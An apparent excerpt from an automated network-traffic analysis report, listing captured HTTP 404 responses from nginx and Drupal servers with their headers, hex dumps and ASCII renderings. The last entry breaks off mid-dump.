            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:32:07 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 16 Sep 2024 07:32:34 GMTx-powered-by: PHP/8.3.8cache-control: must-revalidate, no-cache, privateaccess-control-allow-origin: http://www.groet.onlineaccess-control-allow-credentials: trueaccess-control-expose-headers: truex-drupal-dynamic-cache: UNCACHEABLEcontent-language: enx-content-type-options: nosniffx-frame-options: SAMEORIGINexpires: Sun, 19 Nov 1978 05:00:00 GMTx-generator: Drupal 10 (https://www.drupal.org)vary: Origin,Accept-Encoding,User-Agentupgrade: h2,h2cconnection: Upgradecontent-encoding: gzipcontent-length: 4175content-type: text/html; charset=UTF-8server: ApacheData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 5d 73 db b8 f1 3d bf 02 65 a7 77 ed 8c 21 4a b2 6c cb 3e 4b 9d c4 51 ec 24 56 ec 3b d9 77 c9 4d 67 34 10 09 89 b0 f9 a1 10 a4 6d f9 7a 8f 7d ee 4c 1f fa d4 99 4e 5f fb 0b fa 7b fa 07 da 9f 50 7c 90 14 f8 25 51 8e e4 e4 a6 ce c4 36 09 2c 16 8b c5 62 77 b1 0b e2 d9 b3 c3 5f 41 08 2e 4e 7a fd 1e 78 d9 7b 71 79 0c 20 ec aa 85 27 67 67 6f 0f c0 d7 56 e0 d8 5f cf eb 5e bd 3e ed 81 77 cf 59 fd e0 f2 f8 b8 37 b8 78 7d f6 6e 70 f0 0c 00 f0 ef bf fe f3 3f ff fa 33 e0 f0 10 5e 9b 74 5c e3 8f b5 e0 96 4c 44 f5 df fe 24 ea 94 d2 04 e9 7f ff fe 97 7f 80 17 bd e3 d7 ef c0 d1 e5 e0 e2 ac 0f 2e 7a fd f3 d3 e7 17 3d 70 76 79 71 7e 79 01 c6 be e7 80 af 0d cf c7 7a 60 61 07 53 dd b3 c9 0d f6 3d 3d c0 ce d4 46 01 2b b1 d1 cc 0b 03 3d dd 49 4c fa cb b3 a3 8b 0f e7 3d 41 02 7b e7 7f 80 8d dc 49 47 c3 ae 06 4c e2 77 34 3b f0 35 40 83 99 8d 3b 1a 84 86 67 7b 3e 84 53 9f 38 c8 9f 41 2b c4 07 cd 7a f3 9b 5c 05 45 41 e8 a3 80 78 ee c1 de fe 6f f2 f5 36 99 58 81 8b 29 3d d8 a9 6b 5d c6 89 43 0b 23 93 3f b0 47 07 07 08 18 16 f2 29 0e 3a 5a 18 8c 61 5b 03 3a a3 4f 54 b8 c8 61 a4 1c 63 17 b3 0e 3c 46 9c e1 b9 01 76 19 e4 4b 3f 9c 22 1b 34 ea e0 b7 56 10 4c e9 81 ae df de de d6 4c 51 5c f3 fc c9 ef 72 68 fa de 88 d8 f8 6c 1a 10 87 dc 63 53 41 76 4b cc c0 ca c1 9f 20 d7 b4 b0 6d be f2 09 76 
4d 7b a6 34 08 fc 10 e7 e0 6f 08 be 9d 7a 7e 90 45 dc 31 f1 0d 31 30 14 2f 5b 80 b8 24 20 c8 86 d4 40 8c cf 8d 5a 5d 22 b2 89 7b 0d 7c 6c 77 34 c2 9a 6b c0 f2 f1 b8 a3 e9 45 13 3e 46 37 1c a6 c6 7e 69 20 98 4d 59 df 8c d3 13 ac df b8 66 cd 21 86 ef 51 6f 1c d4 24 1e 86 5b 72 3a 20 81 8d bb e7 0c 0e b8 5e 00 c6 5e e8 9a e0 8f e0 d8 f7 70 50 3b 73 59 ff f8 50 97 40 b2 c1 9c 22 21 12 d4 c2 98 8d cd c1 26 41 1d Data Ascii: ]s=ew!Jl>KQ$V;wMg4mz}LN_{P|%Q6,bw_A.Nzx{qy 'ggoV_^>wY7x}np?3^t\LD$.z=pvyq~yz`aS==F+=IL=A{IGLw4;5@;g{>S8A+z\EAxo6X)=k]C#?G):Za[:OTac<FvK?"4VLLQ\rhlcSAvK mvM{4oz~E110/[$ @Z]"{|lw4kE>F7~i MYf!Qo$[r: ^^pP;sYP@"!&A
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 16 Sep 2024 07:32:34 GMTx-powered-by: PHP/8.3.8cache-control: must-revalidate, no-cache, privateaccess-control-allow-origin: http://www.groet.onlineaccess-control-allow-credentials: trueaccess-control-expose-headers: truex-drupal-dynamic-cache: UNCACHEABLEcontent-language: enx-content-type-options: nosniffx-frame-options: SAMEORIGINexpires: Sun, 19 Nov 1978 05:00:00 GMTx-generator: Drupal 10 (https://www.drupal.org)vary: Origin,Accept-Encoding,User-Agentupgrade: h2,h2cconnection: Upgradecontent-encoding: gzipcontent-length: 4175content-type: text/html; charset=UTF-8server: ApacheData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 5d 73 db b8 f1 3d bf 02 65 a7 77 ed 8c 21 4a b2 6c cb 3e 4b 9d c4 51 ec 24 56 ec 3b d9 77 c9 4d 67 34 10 09 89 b0 f9 a1 10 a4 6d f9 7a 8f 7d ee 4c 1f fa d4 99 4e 5f fb 0b fa 7b fa 07 da 9f 50 7c 90 14 f8 25 51 8e e4 e4 a6 ce c4 36 09 2c 16 8b c5 62 77 b1 0b e2 d9 b3 c3 5f 41 08 2e 4e 7a fd 1e 78 d9 7b 71 79 0c 20 ec aa 85 27 67 67 6f 0f c0 d7 56 e0 d8 5f cf eb 5e bd 3e ed 81 77 cf 59 fd e0 f2 f8 b8 37 b8 78 7d f6 6e 70 f0 0c 00 f0 ef bf fe f3 3f ff fa 33 e0 f0 10 5e 9b 74 5c e3 8f b5 e0 96 4c 44 f5 df fe 24 ea 94 d2 04 e9 7f ff fe 97 7f 80 17 bd e3 d7 ef c0 d1 e5 e0 e2 ac 0f 2e 7a fd f3 d3 e7 17 3d 70 76 79 71 7e 79 01 c6 be e7 80 af 0d cf c7 7a 60 61 07 53 dd b3 c9 0d f6 3d 3d c0 ce d4 46 01 2b b1 d1 cc 0b 03 3d dd 49 4c fa cb b3 a3 8b 0f e7 3d 41 02 7b e7 7f 80 8d dc 49 47 c3 ae 06 4c e2 77 34 3b f0 35 40 83 99 8d 3b 1a 84 86 67 7b 3e 84 53 9f 38 c8 9f 41 2b c4 07 cd 7a f3 9b 5c 05 45 41 e8 a3 80 78 ee c1 de fe 6f f2 f5 36 99 58 81 8b 29 3d d8 a9 6b 5d c6 89 43 0b 23 93 3f b0 47 07 07 08 18 16 f2 29 0e 3a 5a 18 8c 61 5b 03 3a a3 4f 54 b8 c8 61 a4 1c 63 17 b3 0e 3c 46 9c e1 b9 01 76 19 e4 4b 3f 9c 22 1b 34 ea e0 b7 56 10 4c e9 81 ae df de de d6 4c 51 5c f3 fc c9 ef 72 68 fa de 88 d8 f8 6c 1a 10 87 dc 63 53 41 76 4b cc c0 ca c1 9f 20 d7 b4 b0 6d be f2 09 76 
4d 7b a6 34 08 fc 10 e7 e0 6f 08 be 9d 7a 7e 90 45 dc 31 f1 0d 31 30 14 2f 5b 80 b8 24 20 c8 86 d4 40 8c cf 8d 5a 5d 22 b2 89 7b 0d 7c 6c 77 34 c2 9a 6b c0 f2 f1 b8 a3 e9 45 13 3e 46 37 1c a6 c6 7e 69 20 98 4d 59 df 8c d3 13 ac df b8 66 cd 21 86 ef 51 6f 1c d4 24 1e 86 5b 72 3a 20 81 8d bb e7 0c 0e b8 5e 00 c6 5e e8 9a e0 8f e0 d8 f7 70 50 3b 73 59 ff f8 50 97 40 b2 c1 9c 22 21 12 d4 c2 98 8d cd c1 26 41 1d Data Ascii: ]s=ew!Jl>KQ$V;wMg4mz}LN_{P|%Q6,bw_A.Nzx{qy 'ggoV_^>wY7x}np?3^t\LD$.z=pvyq~yz`aS==F+=IL=A{IGLw4;5@;g{>S8A+z\EAxo6X)=k]C#?G):Za[:OTac<FvK?"4VLLQ\rhlcSAvK mvM{4oz~E110/[$ @Z]"{|lw4kE>F7~i MYf!Qo$[r: ^^pP;sYP@"!&A
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 16 Sep 2024 07:32:37 GMTx-powered-by: PHP/8.3.8cache-control: must-revalidate, no-cache, privateaccess-control-allow-origin: http://www.groet.onlineaccess-control-allow-credentials: trueaccess-control-expose-headers: truex-drupal-dynamic-cache: UNCACHEABLEcontent-language: enx-content-type-options: nosniffx-frame-options: SAMEORIGINexpires: Sun, 19 Nov 1978 05:00:00 GMTx-generator: Drupal 10 (https://www.drupal.org)vary: Origin,Accept-Encoding,User-Agentupgrade: h2,h2cconnection: Upgradecontent-encoding: gzipcontent-length: 4175content-type: text/html; charset=UTF-8server: ApacheData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 5d 73 db b8 f1 3d bf 02 65 a7 77 ed 8c 21 4a b2 6c cb 3e 4b 9d c4 51 ec 24 56 ec 3b d9 77 c9 4d 67 34 10 09 89 b0 f9 a1 10 a4 6d f9 7a 8f 7d ee 4c 1f fa d4 99 4e 5f fb 0b fa 7b fa 07 da 9f 50 7c 90 14 f8 25 51 8e e4 e4 a6 ce c4 36 09 2c 16 8b c5 62 77 b1 0b e2 d9 b3 c3 5f 41 08 2e 4e 7a fd 1e 78 d9 7b 71 79 0c 20 ec aa 85 27 67 67 6f 0f c0 d7 56 e0 d8 5f cf eb 5e bd 3e ed 81 77 cf 59 fd e0 f2 f8 b8 37 b8 78 7d f6 6e 70 f0 0c 00 f0 ef bf fe f3 3f ff fa 33 e0 f0 10 5e 9b 74 5c e3 8f b5 e0 96 4c 44 f5 df fe 24 ea 94 d2 04 e9 7f ff fe 97 7f 80 17 bd e3 d7 ef c0 d1 e5 e0 e2 ac 0f 2e 7a fd f3 d3 e7 17 3d 70 76 79 71 7e 79 01 c6 be e7 80 af 0d cf c7 7a 60 61 07 53 dd b3 c9 0d f6 3d 3d c0 ce d4 46 01 2b b1 d1 cc 0b 03 3d dd 49 4c fa cb b3 a3 8b 0f e7 3d 41 02 7b e7 7f 80 8d dc 49 47 c3 ae 06 4c e2 77 34 3b f0 35 40 83 99 8d 3b 1a 84 86 67 7b 3e 84 53 9f 38 c8 9f 41 2b c4 07 cd 7a f3 9b 5c 05 45 41 e8 a3 80 78 ee c1 de fe 6f f2 f5 36 99 58 81 8b 29 3d d8 a9 6b 5d c6 89 43 0b 23 93 3f b0 47 07 07 08 18 16 f2 29 0e 3a 5a 18 8c 61 5b 03 3a a3 4f 54 b8 c8 61 a4 1c 63 17 b3 0e 3c 46 9c e1 b9 01 76 19 e4 4b 3f 9c 22 1b 34 ea e0 b7 56 10 4c e9 81 ae df de de d6 4c 51 5c f3 fc c9 ef 72 68 fa de 88 d8 f8 6c 1a 10 87 dc 63 53 41 76 4b cc c0 ca c1 9f 20 d7 b4 b0 6d be f2 09 76 
4d 7b a6 34 08 fc 10 e7 e0 6f 08 be 9d 7a 7e 90 45 dc 31 f1 0d 31 30 14 2f 5b 80 b8 24 20 c8 86 d4 40 8c cf 8d 5a 5d 22 b2 89 7b 0d 7c 6c 77 34 c2 9a 6b c0 f2 f1 b8 a3 e9 45 13 3e 46 37 1c a6 c6 7e 69 20 98 4d 59 df 8c d3 13 ac df b8 66 cd 21 86 ef 51 6f 1c d4 24 1e 86 5b 72 3a 20 81 8d bb e7 0c 0e b8 5e 00 c6 5e e8 9a e0 8f e0 d8 f7 70 50 3b 73 59 ff f8 50 97 40 b2 c1 9c 22 21 12 d4 c2 98 8d cd c1 26 41 1d Data Ascii: ]s=ew!Jl>KQ$V;wMg4mz}LN_{P|%Q6,bw_A.Nzx{qy 'ggoV_^>wY7x}np?3^t\LD$.z=pvyq~yz`aS==F+=IL=A{IGLw4;5@;g{>S8A+z\EAxo6X)=k]C#?G):Za[:OTac<FvK?"4VLLQ\rhlcSAvK mvM{4oz~E110/[$ @Z]"{|lw4kE>F7~i MYf!Qo$[r: ^^pP;sYP@"!&A
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 16 Sep 2024 07:32:39 GMTx-powered-by: PHP/8.3.8cache-control: must-revalidate, no-cache, privateaccess-control-allow-origin: http://www.groet.onlineaccess-control-allow-credentials: trueaccess-control-expose-headers: truex-drupal-dynamic-cache: UNCACHEABLEcontent-language: enx-content-type-options: nosniffx-frame-options: SAMEORIGINexpires: Sun, 19 Nov 1978 05:00:00 GMTx-generator: Drupal 10 (https://www.drupal.org)vary: Origin,Accept-Encoding,User-Agentupgrade: h2,h2cconnection: Upgradecontent-encoding: gzipcontent-length: 4175content-type: text/html; charset=UTF-8server: ApacheData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 5d 73 db b8 f1 3d bf 02 65 a7 77 ed 8c 21 4a b2 6c cb 3e 4b 9d c4 51 ec 24 56 ec 3b d9 77 c9 4d 67 34 10 09 89 b0 f9 a1 10 a4 6d f9 7a 8f 7d ee 4c 1f fa d4 99 4e 5f fb 0b fa 7b fa 07 da 9f 50 7c 90 14 f8 25 51 8e e4 e4 a6 ce c4 36 09 2c 16 8b c5 62 77 b1 0b e2 d9 b3 c3 5f 41 08 2e 4e 7a fd 1e 78 d9 7b 71 79 0c 20 ec aa 85 27 67 67 6f 0f c0 d7 56 e0 d8 5f cf eb 5e bd 3e ed 81 77 cf 59 fd e0 f2 f8 b8 37 b8 78 7d f6 6e 70 f0 0c 00 f0 ef bf fe f3 3f ff fa 33 e0 f0 10 5e 9b 74 5c e3 8f b5 e0 96 4c 44 f5 df fe 24 ea 94 d2 04 e9 7f ff fe 97 7f 80 17 bd e3 d7 ef c0 d1 e5 e0 e2 ac 0f 2e 7a fd f3 d3 e7 17 3d 70 76 79 71 7e 79 01 c6 be e7 80 af 0d cf c7 7a 60 61 07 53 dd b3 c9 0d f6 3d 3d c0 ce d4 46 01 2b b1 d1 cc 0b 03 3d dd 49 4c fa cb b3 a3 8b 0f e7 3d 41 02 7b e7 7f 80 8d dc 49 47 c3 ae 06 4c e2 77 34 3b f0 35 40 83 99 8d 3b 1a 84 86 67 7b 3e 84 53 9f 38 c8 9f 41 2b c4 07 cd 7a f3 9b 5c 05 45 41 e8 a3 80 78 ee c1 de fe 6f f2 f5 36 99 58 81 8b 29 3d d8 a9 6b 5d c6 89 43 0b 23 93 3f b0 47 07 07 08 18 16 f2 29 0e 3a 5a 18 8c 61 5b 03 3a a3 4f 54 b8 c8 61 a4 1c 63 17 b3 0e 3c 46 9c e1 b9 01 76 19 e4 4b 3f 9c 22 1b 34 ea e0 b7 56 10 4c e9 81 ae df de de d6 4c 51 5c f3 fc c9 ef 72 68 fa de 88 d8 f8 6c 1a 10 87 dc 63 53 41 76 4b cc c0 ca c1 9f 20 d7 b4 b0 6d be f2 09 76 
4d 7b a6 34 08 fc 10 e7 e0 6f 08 be 9d 7a 7e 90 45 dc 31 f1 0d 31 30 14 2f 5b 80 b8 24 20 c8 86 d4 40 8c cf 8d 5a 5d 22 b2 89 7b 0d 7c 6c 77 34 c2 9a 6b c0 f2 f1 b8 a3 e9 45 13 3e 46 37 1c a6 c6 7e 69 20 98 4d 59 df 8c d3 13 ac df b8 66 cd 21 86 ef 51 6f 1c d4 24 1e 86 5b 72 3a 20 81 8d bb e7 0c 0e b8 5e 00 c6 5e e8 9a e0 8f e0 d8 f7 70 50 3b 73 59 ff f8 50 97 40 b2 c1 9c 22 21 12 d4 c2 98 8d cd c1 26 41 1d Data Ascii: ]s=ew!Jl>KQ$V;wMg4mz}LN_{P|%Q6,bw_A.Nzx{qy 'ggoV_^>wY7x}np?3^t\LD$.z=pvyq~yz`aS==F+=IL=A{IGLw4;5@;g{>S8A+z\EAxo6X)=k]C#?G):Za[:OTac<FvK?"4VLLQ\rhlcSAvK mvM{4oz~E110/[$ @Z]"{|lw4kE>F7~i MYf!Qo$[r: ^^pP;sYP@"!&A
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 16 Sep 2024 07:32:42 GMTx-powered-by: PHP/8.3.8cache-control: must-revalidate, no-cache, privatex-drupal-dynamic-cache: HITcontent-language: enx-content-type-options: nosniffx-frame-options: SAMEORIGINexpires: Sun, 19 Nov 1978 05:00:00 GMTx-generator: Drupal 10 (https://www.drupal.org)x-drupal-cache: MISSvary: Origin,Accept-Encoding,User-Agentupgrade: h2,h2cconnection: Upgradecontent-length: 24869content-type: text/html; charset=UTF-8server: ApacheData Raw: 0a 0a 3c 21 2d 2d 20 54 48 45 4d 45 20 44 45 42 55 47 20 2d 2d 3e 0a 3c 21 2d 2d 20 54 48 45 4d 45 20 48 4f 4f 4b 3a 20 27 68 74 6d 6c 27 20 2d 2d 3e 0a 3c 21 2d 2d 20 46 49 4c 45 20 4e 41 4d 45 20 53 55 47 47 45 53 54 49 4f 4e 53 3a 0a 20 20 20 e2 96 aa ef b8 8f 20 68 74 6d 6c 2d 2d 6b 64 73 66 2e 68 74 6d 6c 2e 74 77 69 67 0a 20 20 20 e2 9c 85 20 68 74 6d 6c 2e 68 74 6d 6c 2e 74 77 69 67 0a 2d 2d 3e 0a 3c 21 2d 2d 20 f0 9f 92 a1 20 42 45 47 49 4e 20 43 55 53 54 4f 4d 20 54 45 4d 50 4c 41 54 45 20 4f 55 54 50 55 54 20 66 72 6f 6d 20 27 63 6f 72 65 2f 74 68 65 6d 65 73 2f 6f 6c 69 76 65 72 6f 2f 74 65 6d 70 6c 61 74 65 73 2f 6c 61 79 6f 75 74 2f 68 74 6d 6c 2e 68 74 6d 6c 2e 74 77 69 67 27 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 73 74 79 6c 65 3d 22 2d 2d 63 6f 6c 6f 72 2d 2d 70 72 69 6d 61 72 79 2d 68 75 65 3a 32 30 32 3b 2d 2d 63 6f 6c 6f 72 2d 2d 70 72 69 6d 61 72 79 2d 73 61 74 75 72 61 74 69 6f 6e 3a 37 39 25 3b 2d 2d 63 6f 6c 6f 72 2d 2d 70 72 69 6d 61 72 79 2d 6c 69 67 68 74 6e 65 73 73 3a 35 30 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 47 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 44 72 75 70 61 6c 20 31 30 20 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 75 70 61 6c 2e 6f 72 67 29 22 20 
2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 6f 72 65 2f 74 68 65 6d 65 73 2f 6f 6c 69 76 65 72 6f 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 Data Ascii: <!-- THEME DEBUG --><!-- THEME HOOK: 'html' --><!-- FILE NAME SUGGESTIONS: html--kdsf.html.twig html.html.twig--><!-- BEGIN CUSTOM TEMPLATE OUTPUT from 'core/themes/olivero/templates/layout/html.html.twig' --><!DOCTYPE html><html lang="en" dir="ltr" style="--color--primary-hue:202;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 16 Sep 2024 07:32:48 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 16 Sep 2024 07:32:50 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 